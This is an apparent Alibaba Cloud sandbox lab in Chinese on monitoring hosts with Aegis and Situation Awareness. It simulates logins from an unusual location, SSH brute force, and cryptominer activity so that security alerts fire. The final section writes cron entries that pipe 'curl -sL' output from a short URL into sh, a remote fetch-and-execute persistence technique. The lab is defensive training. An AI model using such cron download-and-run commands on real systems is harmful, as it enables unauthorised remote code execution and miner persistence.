1、实验概述
通过本实验可对云安全中心,态势感知的一些基本操作有深入了解以及如何来对实例进行安全监控
2、实验目标
完成此实验可以掌握的能力有:
在安骑士中添加白名单、登录安全设置
通过态势感知查看实例的相关告警威胁
3、学前建议:
了解安骑士、态势感知控制台
第 1 章:实验背景
1.1 背景知识
安骑士是阿里云云盾推出的一款轻量级主机服务,支持阿里云和非阿里云服务器。通过采集用户主机资产和运行状态、脆弱性和安全告警数据,提供主机威胁检测和自动防御的能力。
态势感知是阿里云云盾下的云上安全监控和诊断服务,面向云上资产提供安全事件检测、漏洞扫描、基线配置核查等服务。态势感知结合了阿里自主研发的大数据和机器学习算法,通过多引擎查杀帮助实时全面了解和有效处理服务器的安全隐患,并实现对云上资产的集中安全管理 。
第 2 章:实验详述
2.1 实验资源
在弹出的左侧栏中,点击 创建资源 按钮,开始创建实验资源。
资源创建过程需要1-3分钟。完成实验资源的创建后,用户可以通过 实验资源 查看实验中所需的资源信息,例如:阿里云账号等。
2.2 实验步骤
通过沙箱申请资源成功后,在本地保存下阿里云账号信息,包括企业别名、子用户名称、子用户密码、AK ID 和AK Secret。点击前往控制台按钮
进入登录页面,输入申请资源处提供的账号,@前为子用户名称,@后为企业别名
复制用户密码
点击登录
一、创建黑客ECS
1.在与沙箱生成的目标ECS的另一个地域,创建一台黑客ECS
点击云服务器ECS
此处可以看到,我们的目标站点在华东二
点击下图的创建实例
镜像选择centos 6.8即可
2.网络选择默认vpc即可
3.管理员root 密码设定为1234@abcd,实例名可以为hack
4.点击确认订单
勾选服务条款,并点击创建实例
5.创建成功
二、将本地IP加入白名单以防被拉黑
1.查询本地IP。通过浏览器打开 www.ip138.com 来查询本地IP
2.在产品服务中找到安骑士
3.在安骑士找到设置,安全配置,点击登录ip拦截加白(点此设置)
4.点击添加
5.将刚刚找到的本地ip复制到源IP中,将目标主机添加到其中,点击确定白名单增加完成。(如果没有列出目标服务器的IP,对象类型选择择:弹性公网EIP)
三、利用不同地域的黑客ECS远程登录监控目标
1.在安骑士入侵检测,异常登录中,查看异地登录,目前没有记录
2.点击登录安全设置
3.点击添加,选择常用登录地,资产勾选目标ECS,并点击确定
4.利用本地远程登录目标ECS
可通过安骑士资产列表查看目标ecs IP地址
Mac版直接通过终端登录,windows版请参考云中沙箱 帮助文档
5.刷新可以看到没有告警提示
6.重复上述登录步骤,登录hack服务器,并远程连接目标ECS
7.再次刷新,可看到异地登录告警记录
四、利用黑客ECS通过SSH登录监控目标ECS(密码故意打错模拟爆破)
1.本地ssh登录黑客ECS
2.通过黑客ECS ssh 登录目标ECS,故意打错密码(多操作几次,3-6次),态势感知会判断为暴破。
五、通过态势感知进行查看威胁
1.在产品服务->安全->态势感知 打开态势感知控制台
2.可以看到有一个安全告警,是之前异地登录的告警
3.点击攻击分析,可查看攻击分析的异常。(模拟暴力破解的异常6个小时内才会同步到攻击分析)
4.点击安全大屏,也可查看安全威胁。
六、模拟矿机异常行为
在目标主机输入命令,模拟矿机行为
echo "/5 * curl -sL https://1.co/6n11111PMR | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "/5 * curl -sL https://1.co/6n1111P1MR | sh" > /var/spool/cron/crontabs/root
crontab –l
过几分钟,在态势感知的 安全告警处理 中,可查看到 进程异常行为。
